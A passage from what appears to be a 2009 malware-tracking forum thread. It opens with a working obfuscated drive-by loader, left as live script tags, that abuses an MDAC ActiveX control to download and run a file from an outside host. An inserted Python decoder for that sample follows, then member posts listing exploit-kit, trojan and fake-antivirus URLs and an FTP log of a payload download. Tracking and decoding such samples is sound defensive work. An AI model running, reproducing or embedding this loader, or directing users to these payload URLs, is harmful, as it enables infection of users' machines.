.57.37.48.68.37.48.65.37.50.48.37.50.48.80.108.117.103.105.110.70.105.108.101.46.87.114.105.116.101.37.50.56.67.104.114.37.50.56.66.121.116.101.67.111.100.101.37.50.57.37.50.57.37.48.68.37.48.65.78.101.120.116.37.48.68.37.48.65.37.50.48.37.50.48.80.108.117.103.105.110.70.105.108.101.46.67.108.111.115.101.37.48.68.37.48.65.37.50.48.37.50.48.83.101.116.37.50.48.111.87.83.104.101.108.108.37.51.68.119.105.110.100.111.119.46.111.82.68.83.46.67.114.101.97.116.101.79.98.106.101.99.116.37.50.56.37.50.50.87.83.99.114.105.37.50.50.37.50.48.37.50.54.37.50.48.37.50.50.112.116.46.83.104.101.108.108.37.50.50.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.79.110.37.50.48.69.114.114.111.114.37.50.48.82.101.115.117.109.101.37.50.48.78.101.120.116.37.48.68.37.48.65.37.50.48.37.50.48.111.87.83.104.101.108.108.46.82.117.110.37.50.48.37.50.56.119.105.110.100.111.119
.46.101.120.101.78.97.109.101.37.50.57.37.50.67.49.37.50.67.70.65.76.83.69.37.48.68.37.48.65.69.108.115.101.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.77.111.100.101.37.51.68.97.100.77.111.100.101.82.101.97.100.87.114.105.116.101.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.84.121.112.101.37.51.68.97.100.84.121.112.101.66.105.110.97.114.121.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.79.112.101.110.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.87.114.105.116.101.37.50.48.119.105.110.100.111.119.46.88.77.76.66.111.100.121.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.83.97.118.101.84.111.70.105.108.101.37.48.68.37.48.65.37.48.68.37.48.65.119.105.110.100.111.119.46.101.120.101.78.97.109.101.37.50.67.97.100.83.97.118.101.67.114.101.97.116.101.79.118.101.114.87.114.105.116.101.37.48.68.37.48.65.37.50.48.119.105.110.100.111.119.46.111.83.104.101.108.108.65.112.112.46.83.104.101.108.108.69.120.101.99.117.116.101.37.50.48.119.105.110.100.111.119.46.101.120.101.78.97.109.101.37.48.68.37.48.65.69.110.100.37.50.48.73.102.37.48.68.37.48.65.37.51.67.37.50.70.115.99.114.105.112.116.37.51.69.37.48.68.37.48.65.37.51.67.115.99.114.105.112.116.37.50.48.108.97.110.103.117.97.103.101.37.51.68.37.50.50.86.66.83.99.114.105.112.116.37.50.50.37.51.69.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.111.110.37.50.48.101.114.114.111.114.37.50.48.114.101.115.117.109.101.37.50.48.110.101.120.116.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.100.108.37.50.48.37.51.68.37.50.48.37.50.50.104.116.116.112.37.51.65.37.50.70.37.50.70.50.51.51.50.52.50.46.99.111.109.37.50.70.49.37.50.70.108.111.97.100.46.112.104.112.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.83.101.116.37.50.48.100.102.37.50.48.37.51.68.37.50.48.100.111.99.117.109.101.110.116.46.99.114.101.97.116.101.69.108.101.109.101.110.116.37.50.56.37.50.50.111.98.106.101.99.116.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.3
7.50.48.99.108.115.49.37.51.68.37.50.50.99.108.115.105.100.37.51.65.66.68.57.54.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.99.108.115.50.37.51.68.37.50.50.67.53.53.54.45.54.53.65.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.99.108.115.51.37.51.68.37.50.50.51.45.49.49.68.48.45.57.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.99.108.115.52.37.51.68.37.50.50.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.54.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.99.108.115.102.117.108.108.37.51.68.99.108.115.49.37.50.54.99.108.115.50.37.50.54.99.108.115.51.37.50.54.99.108.115.52.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.100.102.46.115.101.116.65.116.116.114.105.98.117.116.101.37.50.48.37.50.50.99.108.97.115.115.105.100.37.50.50.37.50.67.99.108.115.102.117.108.108.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.49.37.51.68.37.50.50.77.105.99.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.50.37.51.68.37.50.50.114.111.115.111.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.51.37.51.68.37.50.50.102.116.46.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.52.37.51.68.37.50.50.88.77.76.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.53.37.51.68.37.50.50.72.84.84.80.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.37.51.68.115.116.114.49.37.50.54.115.116.114.50.37.50.54.115.116.114.51.37.50.54.115.116.114.52.37.50.54.115.116.114.53.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.83.101.116.37.50.48.120.37.50.48.37.51.68.37.50.48.100.102.46.67.114.101.97.116.101.79.98.106.101.99.116.37.50.56.115.116.114.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.97.119.98.49.37.51.68.37.50.50.65.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.
</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|*]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("QIgskwBJjInK_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script></script>
<style>.M7RtpCTPdGVn6K_41K{display:none;}</style>
<b class="M7RtpCTPdGVn6K_41K" id="K_41K1">^e!^^^v^!^a^l!^</b>
<script>window.onerror = return(true);</script>
<div class="M7RtpCTPdGVn6K_41K" id="M7RtpCTPdGVn6K_41K">13.10.100.111.99.117.109.101.110.116.46.119.114.105.116.101.40.34.60.111.98.106.101.99.116.32.105.100.61.92.34.75.95.52.49.75.67.56.122.92.34.32.99.108.97.115.115.105.100.61.92.34.99.108.115.105.100.58.123.57.55.65.70.52.65.52.53.45.52.57.66.69.45.52.52.56.53.45.57.70.53.53.45.57.49.65.66.52.48.70.50.56.56.70.50.125.92.34.62.60.47.111.98.106.101.99.116.62.34.41.59.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.65.56.122.40.41.13.10.32.123.13.10.32.118.97.114.32.75.95.52.49.75.66.56.122.32.61.32.34.104.116.116.112.58.47.47.50.51.51.50.52.50.46.99.111.109.47.49.47.108.111.97.100.46.112.104.112.34.13.10.32.75.95.52.49.75.67.56.122.46.79.112.101.110.87.101.98.70.105.108.101.40.75.95.52.49.75.66.56.122.41.13.10.32.125.13.10.32.75.95.52.49.75.65.56.122.40.41.59.13.10.32</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|^]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("M7RtpCTPdGVn6K_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script>
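Added example, not code from the post or any project: a Python reimplementation of the decoding steps the script above performs in the browser, so the stage-2 payload can be decoded and its indicators pulled out statically instead of by running it. SAMPLE_STAGE2 is the decimal blob from the hidden div in the post; the function names are my own.

```python
"""Static decoder for the two-stage obfuscated loader pasted above.

Added example (not the forum's or any project's code). It mirrors the
decoding the posted script does in the browser so an analyst can recover
the indicators without executing the sample. Function names are my own.
"""
import re

# Contents of <div id="M7RtpCTPdGVn6K_41K"> in the post, copied verbatim and
# split across lines only for readability (treated as data, never executed).
SAMPLE_STAGE2 = (
    "13.10.100.111.99.117.109.101.110.116.46.119.114.105.116.101.40.34.60.111.98.106.101.99.116.32.105.100.61.92.34.75.95."
    "52.49.75.67.56.122.92.34.32.99.108.97.115.115.105.100.61.92.34.99.108.115.105.100.58.123.57.55.65.70.52.65.52.53.45.52."
    "57.66.69.45.52.52.56.53.45.57.70.53.53.45.57.49.65.66.52.48.70.50.56.56.70.50.125.92.34.62.60.47.111.98.106.101.99.116."
    "62.34.41.59.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.65.56.122.40.41.13.10.32.123.13.10.32.118.97.114.32."
    "75.95.52.49.75.66.56.122.32.61.32.34.104.116.116.112.58.47.47.50.51.51.50.52.50.46.99.111.109.47.49.47.108.111.97.100."
    "46.112.104.112.34.13.10.32.75.95.52.49.75.67.56.122.46.79.112.101.110.87.101.98.70.105.108.101.40.75.95.52.49.75.66.56."
    "122.41.13.10.32.125.13.10.32.75.95.52.49.75.65.56.122.40.41.59.13.10.32"
)

# Text of the hidden <b id="K_41K1"> element in the post.
SAMPLE_STAGE1 = "^e!^^^v^!^a^l!^"


def recover_stage1(inner_html, junk="!|^*"):
    """Stage 1: drop the junk characters the script removes with
    .replace(/[!|^]/g, "") (the first copy uses /[!|*]/g). On the sample
    this leaves "eval"; the script passes that string to eval() to obtain a
    reference to eval itself, which it later calls on the decoded stage 2."""
    return re.sub("[" + re.escape(junk) + "]", "", inner_html)


def js_letter_map(ch):
    """Mirror of the per-letter callback in the script:
    (((c & 223) - 52) % 26) + (c & 32) + 65. Masking with 223 folds to
    upper case, 52 is 'A' - 13, and (c & 32) restores the case bit, so the
    whole thing is plain ROT13. The sample blob holds only digits and dots,
    so here it changes nothing; it is kept so blobs with letters decode
    the same way the browser would decode them."""
    c = ord(ch)
    return chr((((c & 223) - 52) % 26) + (c & 32) + 65)


def decode_stage2(blob):
    """Stage 2: ROT13 any letters, split on '.', and map every token to the
    character with that code, as String.fromCharCode does. A token that is
    not a number is NaN in JS, which fromCharCode renders as U+0000;
    reproduce that instead of raising so decoding never stops early."""
    text = re.sub(r"[A-Za-z]", lambda m: js_letter_map(m.group(0)), blob)
    return "".join(chr(int(tok)) if tok.isdigit() else "\x00"
                   for tok in text.split("."))


def extract_iocs(decoded):
    """Indicators a defender wants from the decoded stage: the URLs the
    loader contacts and the CLSIDs of the ActiveX controls it instantiates."""
    urls = re.findall(r'https?://[^\s"\'<>\\]+', decoded)
    clsids = re.findall(r"clsid:(\{[0-9A-Fa-f-]{36}\})", decoded, re.I)
    return {"urls": urls, "clsids": [c.upper() for c in clsids]}


def analyse(stage1_html=SAMPLE_STAGE1, stage2_blob=SAMPLE_STAGE2):
    """Run both stages and return what a blocklist or IDS rule needs."""
    decoded = decode_stage2(stage2_blob)
    report = {"stage1_call": recover_stage1(stage1_html),
              "decoded_length": len(decoded)}
    report.update(extract_iocs(decoded))
    return report


if __name__ == "__main__":
    for key, value in analyse().items():
        print(f"{key}: {value}")
```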
Title: Re: daily something......
Post by: SysAdMini on April 05, 2009, 07:08:36 pm
I believe reports to

newsineurope.net/z/config.bin
newsineurope.net/z/s.php?1=smoked_000de8e6&i=test
newsineurope.net/z/s.php?2=smoked_000de8e6&n=0&v=16778770&i=test&s=0&sp=0&lcp=0&pr=0
newsineurope.net/z/s.php?2=smoked_000de8e6&n=1&v=16778770&i=test&s=0&sp=0&lcp=0&pr=0
newsineurope.net/z/s.php?3=smoked_000de8e6&id=1238936099

http://wepawet.cs.ucsb.edu/view.php?hash=7e2b3bcf078f597a13b9d4f3cf60283c&t=1238957989&type=js

has changed to mabira.net/z/config.bin at the same host.
newsineurope.net/z/config.bin is not available.
Title: Re: daily something......
Post by: SysAdMini on April 05, 2009, 08:02:28 pm
Code: [Select]
javacsript.biz/in/in.cgi?2
http://wepawet.cs.ucsb.edu/view.php?hash=a85e578048b1a2f6bd32246b5c9ef7b9&t=1238961548&type=js

redirects to exploits at
Code: [Select]
http://netcorbina.org/in90/
netcorbina.org/in90/iepdf.php?f=new
http://www.virustotal.com/analisis/e0798c9484695e356ca872fb150410ca 1/40

trojan
Code: [Select]
http://netcorbina.org/in90/load.php
http://www.virustotal.com/analisis/f1051127ffaba83b33e3761c455a46c5 2/40
Title: Re: daily something......
Post by: CkreM on April 05, 2009, 09:14:18 pm
rogue:
Code: [Select]
http://tubeloyaln.com/scan/?id=260
http://winpc-antivirus.com/

exploit/trojan:
Code: [Select]
http://sykalab.net/inn/index.php
http://wepawet.iseclab.org/view.php?hash=c8b425b1ef9fb404ee337d4e72d467b6&t=1238959411&type=js
Title: Re: daily something......
Post by: sowhat-x on April 06, 2009, 11:59:07 am
These two are quite well detected...
Quote
hxxp://put.ghura.pl/81.exe
hxxp://put.ghura.pl/wr.exe

This one isn't very well detected...
Quote
hxxp://nemesis.feed.parkingspa.com/NemesisClient.cab
http://www.virustotal.com/analisis/d8f47e014b7190ba7ec12112ea7c5ba8

And the well-known friends from zief.pl once again...
Quote
hxxp://zief.pl/iraq.jpg/
http://www.virustotal.com/analisis/7e573eac2d13fbc94bf9d81d2702c140
--->
hxxp://jl.chura.pl/rc/pdf.php?id=456346
http://wepawet.iseclab.org/view.php?hash=c5ec3e0138dd5d5b4d9c204654deb18a&t=1239017754&type=js
Zief.pl crap in attachment as well, password is "infected" as always...
Title: Re: daily something......
Post by: SysAdMini on April 06, 2009, 12:06:30 pm
exploit
Code: [Select]
http://www.poshlivse.com/index.php
http://wepawet.iseclab.org/view.php?hash=92dff88b48386b1b933001ca33b73212&t=1239014786&type=js

trojan
Code: [Select]
http://www.poshlivse.com/load.php
MD5...: 38970d48df49ca67e06a755350ca9029
http://www.virustotal.com/analisis/ef07a0f7e3e2b1413a9fd591ceede630 2/40
eSafe    7.0.17.0    2009.04.05    Suspicious File
Sophos    4.40.0    2009.04.06    Mal/EncPk-HJ

A compromised site which contains an Iframe to this site is
Code: [Select]
limitin.de
http://wepawet.iseclab.org/view.php?hash=cd2389a3c5064493afe100c17c953d11&t=1239015252&type=js

trojan Koobface
Code: [Select]
79.119.2.227/pid=1000/setup.exe
98.200.26.126/pid=1000/setup.exe
Title: Re: daily something......
Post by: sowhat-x on April 06, 2009, 12:51:34 pm
Another Koobface...
Quote
hxxp://96.35.12.230
hxxp://96.35.12.230/player.swf?pid=6123
hxxp://96.35.12.230/setup.exe

What's kinda interesting actually is the .swf itself...
http://www.virustotal.com/analisis/428b28603b7ef35dfa4b35d85ae65fcc
And after being decompressed also...
http://wepawet.iseclab.org/view.php?hash=c17f6d015c0bc212850fc20e9133e700&type=swf
http://www.virustotal.com/analisis/388afb42ca35d977a980b631b6f7419b
Can't really say it's not to be considered at least as a malware component...  :-\

Quote
hxxp://61.235.117.70/update.exe
http://www.virustotal.com/analisis/b6d794becce8fad6b6a20a581998dbe1

"It works!" -> is that so?  :D
Quote
hxxp://usacaaugb.cn/life/iepdf.php?f=new
hxxp://usacaaugb.cn/life/iepdf.php?f=old
hxxp://usacaaugb.cn/life/load.php

Quote
hxxp://www.ohtas.biz/stproj/flash.php
Result: 11/40 (27.5%)
http://www.virustotal.com/analisis/809a0e88b7935b661a46fab342169c8a

Quote
hxxp://www.vivne.cn/vn.exe
http://www.virustotal.com/analisis/e3ae284eb9482b92f5cd7f09781c451a
http://anubis.iseclab.org/?action=result&task_id=1f8ac8cc0933668946de525e26eae0872&format=html
Title: Re: daily something......
Post by: SysAdMini on April 06, 2009, 05:53:13 pm
pdf exploit/trojan
Code: [Select]
famajormusic.ru/jjkj/in.php
http://wepawet.cs.ucsb.edu/view.php?hash=5bb19ee926f1557416d2ee2131adf36e&t=1239040477&type=js
http://www.virustotal.com/analisis/c6087121de76e697622bb78ded6e8e8d 6/40
Title: Re: daily something......
Post by: CkreM on April 06, 2009, 06:10:08 pm
Rogue:
Code: [Select]
Soldiersoftware.net
Redirect to exploit:
Code: [Select]
fikalo.de
http://wepawet.iseclab.org/view.php?hash=a3d3398c25bdc7262e98bd19cdee44c1&t=1239025317&type=js
Title: Re: daily something......
Post by: sparsha on April 07, 2009, 07:32:52 am
Code: [Select]
Fake scanners:

http://sys-scan-wiz.org/download.php?page=http://sys-scan-wiz.org/
scanner-wiz-1.com
Avs-online-scan.org
av-lookup.org
Free-web-scaners.net/disk/?code=286
http://am-scan.com/l3/index.html?ref_id=7091
http://am-scan.com/download.php?page=http://am-scan.com/l3/index.html?ref_id=7091

Rogue installers:

http://222.186.9.187/setup.exe
http://www.spy-protector-pro.com/install.exe
http://chorussoft.biz/install.exe

http://webwidesecurity.com/index.php?affid=09400
http://webwidesecurity.com/download.php?affid=00000

fastpayprocess.com -> Pandora Software

Fake codecs:
xviewworldmy2.com/view/1/1220/3
Title: Re: daily something......
Post by: SysAdMini on April 07, 2009, 07:59:44 am
exploits/Zbot
Code: [Select]
jeans0nline.cn/win/index.php?iuBgwPa
http://wepawet.iseclab.org/view.php?hash=2c245804906db1beb7aa12d7d6c18abd&t=1239091219&type=js
http://www.virustotal.com/analisis/fbc3fe9d822e4e95f6118663a438d051 5/40

It is a new Zbot variant which uses new file names.

http://www.threatexpert.com/report.aspx?md5=557c2e0a44e5fa46668383209dc7d65a
Title: Re: daily something......
Post by: sparsha on April 07, 2009, 09:23:25 am
Few more

Code: [Select]
http://antiviral-scan-pro.com/11041/3/
http://files.load-pro-antispy.com/normal/setup_11041_3_1.exe

http://goforuniq.com/in.cgi?13&gai=csptop&gli=400&gff=cs_3578123074&al=

http://bonuspromooffer.com/vsm/adv/142/?a=csptop-sst&l=400&f=cs_3578123074&ex=&ed=&h=&sub=csp&prodabbr=3P_UVSM
http://dwnld.bonuspromooffer.com/secure/4f6c9cf2c210fefe73170ddfe8880e38/49db0f09/vsm/vsm_free_setup.exe
http://dwnld.promotion-offer.com/secure/2b686c9bbf54a2803cc230f1a3e6eb1d/49db1161/srm/srm_free_setup.exe

http://www.xp-shield.cn/download.html


Title: Re: daily something......
Post by: sparsha on April 07, 2009, 09:35:19 am
couple more links
Code: [Select]
best-av1.info
http://download.best-av1.info/en/PE/install.exe


Other files usually used by this rogue family [browser hijacker, Fake BSOD..]
Code: [Select]
http://download.best-av1.info/en/PE/N1.CAB
http://download.best-av1.info/en/PE/QWProtect.dll
http://download.best-av1.info/en/PE/svchost.exe

Title: Re: daily something......
Post by: SysAdMini on April 07, 2009, 03:36:52 pm
pdf/flash exploit
Code: [Select]
truff.biz/myy/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=485a23bf02f4721e4170bffe1dfc0903&t=1239118663&type=js

trojan
Code: [Select]
http://truff.biz/myy/load.php?id=4
http://www.virustotal.com/analisis/78ca3e1b17cf6b3499d9714cf2cdda15
Title: Re: daily something......
Post by: CkreM on April 07, 2009, 04:22:48 pm
seems like Zeus in the end:
Code: [Select]
http://update3.cn/spl111/index.php
http://wepawet.iseclab.org/view.php?hash=13b9fbbd568f6bbba6bfb2088e20610d&t=1239121445&type=js
Title: Re: daily something......
Post by: CkreM on April 07, 2009, 07:14:39 pm
pdf exploit leading to zeus infection:
Code: [Select]
http://233242.info/1/include/spl.php
http://233242.info/1/load.php
http://www.virustotal.com/analisis/d6fcdb78ed428bf52f47e6fb75bed6fc
http://wepawet.iseclab.org/view.php?hash=b03cbc6d02dc98d6b9527060c8a7ebe9&t=1239125074&type=js

now this exploit isn't working well for me (if anyone else could check it, would be nice)
should start here but gave me some kind of error:
Code: [Select]
http://sh-hostz9.net/1/index.php
http://wepawet.iseclab.org/view.php?hash=20c7f173f3a113538dea1ba392d13305&t=1239121977&type=js

Iframes to :
Code: [Select]
http://sh-hostz9.net/1/pdf.php
http://wepawet.iseclab.org/view.php?hash=3c236eaec1299ed3c633aed33ae1736e&t=1239122033&type=js
and
Code: [Select]
http://sh-hostz9.net/1/vparivatel.php  (from here it gives you a screen to do some update)
http://wepawet.iseclab.org/view.php?hash=9a310342e3d2202d661d75be9333b869&t=1239131443&type=js
finally leads to the trojan:
Code: [Select]
http://sh-hostz9.net/1/load.php

Hmm, now it's starting from:
Code: [Select]
http://sh-hostz9.net/2/index.php
http://wepawet.iseclab.org/view.php?hash=f883649411359a991e9f55e2cc541cc8&t=1239132145&type=js

leading also to:
Code: [Select]
http://sh-hostz9.net/2/pdf.php
lol changed after 30 min or so ~.~
Title: Re: daily something......
Post by: sowhat-x on April 07, 2009, 07:41:32 pm
Quote
now this exploit isn't working well for me (if anyone else could check it, would be nice)
Both of them are on the same IP address, 220.196.59.26, meaning there's a good chance that if you visited one of them first...
And the rest of the domains hosted there aren't much different, heh... but I didn't manually verify them, merely googled them.

Earlier IPs in the same netblock there host malicious domains from what I see...
Will attempt digging them tomorrow though, need some sleep now ;-)
Quote
hxxp://goshak.biz/my/index.php
Title: Re: daily something......
Post by: CkreM on April 07, 2009, 07:48:48 pm
Quote
now this exploit isn't working well for me (if anyone else could check it, would be nice)
Both of them are on the same IP address, 220.196.59.26, meaning there's a good chance that if you visited one of them first...
And the rest of the domains hosted there aren't much different, heh... but I didn't manually verify them, merely googled them.

Earlier IPs in the same netblock there host malicious domains from what I see...
Will attempt digging them tomorrow though, need some sleep now ;-)
Quote
hxxp://goshak.biz/my/index.php


changed my IP between tries

anyway it's not that it recognizes my IP or something, it just gives some error saying "file does not begin with %pdf" or something like that

also another one on that IP:

Code: [Select]
http://volimir.biz/my/index.php
http://wepawet.iseclab.org/view.php?hash=57cae50b99f2591b0612eba32de4a67b&t=1239134249&type=js

the pdf exploit itself is at (wepawet didn't analyze it):
Code: [Select]
http://volimir.biz/my/cache/readme.pdf
http://wepawet.iseclab.org/view.php?hash=22ae140b9b2f549caffb7328bb4dbf0c&t=1239134421&type=js
Title: Re: daily something......
Post by: sowhat-x on April 07, 2009, 08:09:55 pm
Oh, the .pdf file itself you meant? I'll check it tomorrow, my mind isn't working properly at the moment, plus I'm not in front of a VM... I need to sleep.
Last one for tonight - exploring the rest of this IP is... "left as an exercise for the reader"  :D
http://www.bfk.de/bfk_dnslogger.html?query=220.196.59.17#result
Quote
hxxp://xdwlnbqsdsph5pc8rz81.cn/s_t.php
Title: Re: daily something......
Post by: CM_MWR on April 07, 2009, 08:24:37 pm
Forget where these dingleberries fell from... ???

174.133.72.250/p0324/2.0/td.bin?bb021908657356
174.133.73.178/p0324/2.0/d.bin?bb021908154292
75.125.239.42/p0324/2.0/so.bin?bb021908350659
dglcxlcfmk.net/bbsuper0.php
dglcxlcfmk.net/bbsuper1.php
dglcxlcfmk.net/bbsuper2.php
dglcxlcfmk.net/bbsuper3.php
dglcxlcfmk.net/uniq.php?id=1693466186&p=0
zief.pl/wr.exe
install.8800.org/files/5.exe
install.8800.org/files/adx.exe
install.8800.org/files/ipk.exe
install.8800.org/files/zha.exe
stanishev.com/1/nfr.exe
stanishev.com/1/pp.06.exe
xz.wanggui.com/mem322.exe
Title: Re: daily something......
Post by: Mr Clean on April 07, 2009, 08:28:08 pm
Oh, the .pdf file itself you meant? I'll check it tomorrow, my mind isn't working properly at the moment, plus I'm not in front of a VM... I need to sleep.
Last one for tonight - exploring the rest of this IP is... "left as an exercise for the reader"  :D
http://www.bfk.de/bfk_dnslogger.html?query=220.196.59.17#result
Quote
hxxp://xdwlnbqsdsph5pc8rz81.cn/s_t.php



nifty!
sets up an ftp and AT jobs to run every 15 minutes, et al.

http://wepawet.iseclab.org/view.php?hash=19d22d89420a09c6d59b1d032f19de94&t=1239135714&type=js

Code: [Select]
ftp> open 122.224.9.221
Connected to 122.224.9.221.
220 www.host.com FTP server (Version 6.00LS) ready.
500 AUTH GSSAPI: command not understood.
500 AUTH KERBEROS_V4: command not understood.
KERBEROS_V4 rejected as an authentication type
Name (122.224.9.221:sandbox): qqq
331 Password required for qqq.
Password:
230 User qqq logged in, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get calc.exe
local: calc.exe remote: calc.exe
227 Entering Passive Mode (122,224,9,221,202,67)
150 Opening BINARY mode data connection for 'calc.exe' (245248 bytes).
226 Transfer complete.
245248 bytes received in 2.7 seconds (89 Kbytes/s)
ftp> quit
221 Goodbye.
$ mv calc.exe oddyoy.exe

http://www.malwaredomainlist.com/mdl.php?search=122.224.9&colsearch=All&quantity=50

http://www.virustotal.com/analisis/b80457dd723351fa2a2ff176bcfe8e8b

http://anubis.iseclab.org/?action=result&task_id=141ccbbd213e2be145dd0d57fc0a2d48e

Code: [Select]
http://13-2005-search.com/new1.php

<A HREF=http://xxxhardpornteenxxx.com
><BR><BR><BR><BR><BR><BR><BR><BR><BR><CENTER><FONT SIZE=+6>ENTER</FONT></A>

$ dig 13-2005-search.com +short
220.196.59.1


Busy little network
http://www.malwaredomainlist.com/mdl.php?search=220.196.59&colsearch=All&quantity=50

Title: Re: daily something......
Post by: mercutio on April 08, 2009, 03:38:05 am
Regarding the PDF at hxxp://sh-hostz9.net/1/index.php, they must have something wrong in their scripts:
Code: [Select]
?>?>?><b>FPDF error:</b> Some data has already been output, can't send PDF file
Title: Re: daily something......
Post by: sowhat-x on April 08, 2009, 08:21:32 am
The rest from the same IP mentioned yesterday... pretty easy task:
Quote
hxxp://dihbgbwqryuolfbebgme.cn/s_t.php
hxxp://dcz9ubei212vp3nrca5i.cn/s_t.php
hxxp://znchygdrmelzejjvofji.cn/s_t.php
hxxp://virevpcklvlrxjcqxtij.cn/s_t.php
hxxp://xbfnyukgdoqrjrsfmcdm.cn/s_t.php
hxxp://qjiv7qj4irh2f1o2v8sm.cn/s_t.php
hxxp://1zs0ewvqcget52rl1z1n.cn/s_t.php
hxxp://lufwhtelkadvrtaukqjo.cn/s_t.php
hxxp://ddvrrflabpqcuoaexpwp.cn/s_t.php
hxxp://lmempodfzrqqkteyupar.cn/s_t.php
hxxp://zjjrrhhuokjxgmulisxs.cn/s_t.php
hxxp://tckeblkiumuhysrwqlev.cn/s_t.php
hxxp://egntxselsaossawilurx.cn/s_t.php
hxxp://hsyzpbavkojdqclhnoqz.cn/s_t.php
==================
Quote
hxxp://msvcp70.biz/e514.gif
hxxp://msvcp70.biz/e536.gif
hxxp://msvcp70.biz/e509.gif

Quote
hxxp://msvcp50.biz/e514.gif
hxxp://msvcp50.biz/e536.gif
hxxp://msvcp50.biz/e509.gif

Quote
hxxp://yourguardon.com/
Iframes to goshak.biz listed earlier...
==================
Quote
Code: [Select]

ftp> open 122.224.9.221
Connected to 122.224.9.221.
............

Here's the rest of domains there...  :)
http://www.bfk.de/bfk_dnslogger.html?query=122.224.9.221#result
Quote
hxxp://wllvvkjknh.cn/md/index.php
hxxp://woqyymmptn.cn/md/index.php
hxxp://ozimzikjun.cn/md/index.php
hxxp://zusojbktvo.cn/md/index.php
hxxp://enjnzdfmts.cn/md/index.php
hxxp://fxlbubmkfs.cn/md/index.php
hxxp://pxciiruurw.cn/md/index.php

As for the one not listed above, miss-office-2009.com namely...
seems we've got a pretty hardcore spammer here, so... let's vote for him ;-)
http://www.google.com/search?q=miss-office-2009.com
Title: Re: daily something......
Post by: CkreM on April 08, 2009, 10:53:00 am
Regarding the PDF at hxxp://sh-hostz9.net/1/index.php, they must have something wrong in their scripts:
Code: [Select]
?>?>?><b>FPDF error:</b> Some data has already been output, can't send PDF file


yeah, that's what I was talking about, kept getting this error though in the end it did redirect me to the other iframe there at vparivatel.php
Title: Re: daily something......
